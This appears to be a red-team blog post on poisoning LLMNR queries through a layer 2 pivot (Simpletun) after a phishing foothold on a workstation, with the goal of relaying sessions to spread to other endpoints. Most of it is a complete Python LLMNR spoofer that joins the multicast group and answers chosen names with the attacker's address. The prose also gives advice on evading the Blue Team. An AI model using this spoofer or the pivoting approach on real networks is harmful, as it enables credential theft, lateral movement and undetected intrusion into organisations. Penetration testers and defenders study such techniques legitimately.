
In the previous post we discussed using Responder with Snarf; this post does the same, but through a pivot. To pivot in we will use Simpletun and a layer 2 pivoting client. This gives us the ability to assign an IP address to an interface on our attacking VM, listen for broadcasts on the target segment and, where a host is asking for something we can answer, respond. Commercial products such as Metasploit Pro and Cobalt Strike have this feature built in and perform the pivot over encrypted channels; if you are not intentionally looking to get caught by the Blue Team, use them. Another option is Inveigh, a PowerShell LLMNR/NBNS spoofer with relay capabilities that is included in Empire and can poison from the pivot host without the layer 2 tunnel.

After a successful phishing campaign we have a foothold on Hal's PC, int-win10. Hal is a domain user with local administrator on int-win10 but no privileges elsewhere. The goal is to spread to other endpoints on the directly connected network, extending our foothold and, hopefully, our privileges.

Same as in the previous blog post, Frank is still sending LLMNR queries (multicast to 224.0.0.252) looking for a file share that does not exist.

Our preference is to slowly and deliberately use relayed sessions to exploit other endpoints.
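To make concrete what "listen for broadcasts and respond" means for Frank's query, here is an added example (not code from the original post, nor from Responder, Snarf or Inveigh) that parses an LLMNR query in the RFC 4795 wire format and builds the poisoned answer a spoofer sends back. The queried name "fileshare", the transaction ID and the answer address 10.0.0.5 (standing in for the attacker's pivot interface) are assumptions; the sample packet is constructed by hand.

```python
"""Minimal LLMNR query parser and poisoned-response builder (RFC 4795 wire format).

Added example, not code from the original post, Responder, Snarf or Inveigh.
The answer IP 10.0.0.5 (the attacker's pivot interface) and the queried name
"fileshare" are assumptions; SAMPLE_QUERY below is constructed by hand.
"""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 multicast group every LLMNR query is sent to
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """Encode a host name as DNS-style length-prefixed labels plus a zero terminator."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"


def decode_name(data, offset):
    """Decode labels starting at offset; return (name, offset just past the terminator)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            # DNS-style compression pointers are not handled by this minimal parser
            raise ValueError("unexpected compression pointer")
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_query(pkt):
    """Parse an LLMNR query; raise ValueError for anything that is not a single-question query."""
    if len(pkt) < 12:
        raise ValueError("short LLMNR header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    name, off = decode_name(pkt, 12)
    if len(pkt) < off + 4:
        raise ValueError("truncated question section")
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def build_poisoned_response(query, answer_ip, ttl=30):
    """Answer an A/IN query with answer_ip: header with QR=1 and ANCOUNT=1, the echoed
    question, and a single A record. The asker will then try to reach answer_ip."""
    if (query["qtype"], query["qclass"]) != (QTYPE_A, QCLASS_IN):
        raise ValueError("only A/IN queries are answered")
    header = struct.pack("!6H", query["id"], 0x8000, 1, 1, 0, 0)
    answer = (encode_name(query["name"])
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(answer_ip))
    return header + query["question"] + answer


def listen_and_poison(answer_ip, local_ip, names=None):
    """Join the LLMNR group on the interface owning local_ip (the pivot interface) and answer
    queries, optionally only for the lowercased names given, unicast back to the asker.
    Port 5355 is unprivileged, so no root is needed just to bind. Never returns."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(local_ip)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        pkt, (src_ip, src_port) = sock.recvfrom(2048)
        try:
            query = parse_query(pkt)
            if names and query["name"].lower() not in names:
                continue   # only claim the names we were told to claim
            sock.sendto(build_poisoned_response(query, answer_ip), (src_ip, src_port))
        except ValueError:
            continue       # not a query we can answer; stay quiet


# Constructed sample: a host asking for the A record of "fileshare",
# transaction ID 0x1a2b, flags 0 (query), QDCOUNT 1, no other sections.
SAMPLE_QUERY = (bytes.fromhex("1a2b 0000 0001 0000 0000 0000")
                + b"\x09fileshare\x00"
                + b"\x00\x01\x00\x01")

if __name__ == "__main__":
    q = parse_query(SAMPLE_QUERY)
    print("query id 0x%04x for %r (qtype %d)" % (q["id"], q["name"], q["qtype"]))
    print(build_poisoned_response(q, "10.0.0.5").hex())
```

Note the response is sent unicast to the asker's source address and port rather than back to the multicast group, which is how LLMNR responders behave and why a spoofer on the segment wins simply by being the first to answer. Restricting `names` to the share Frank is asking for keeps the poisoning targeted, which matters when the goal is to stay quiet on the pivot.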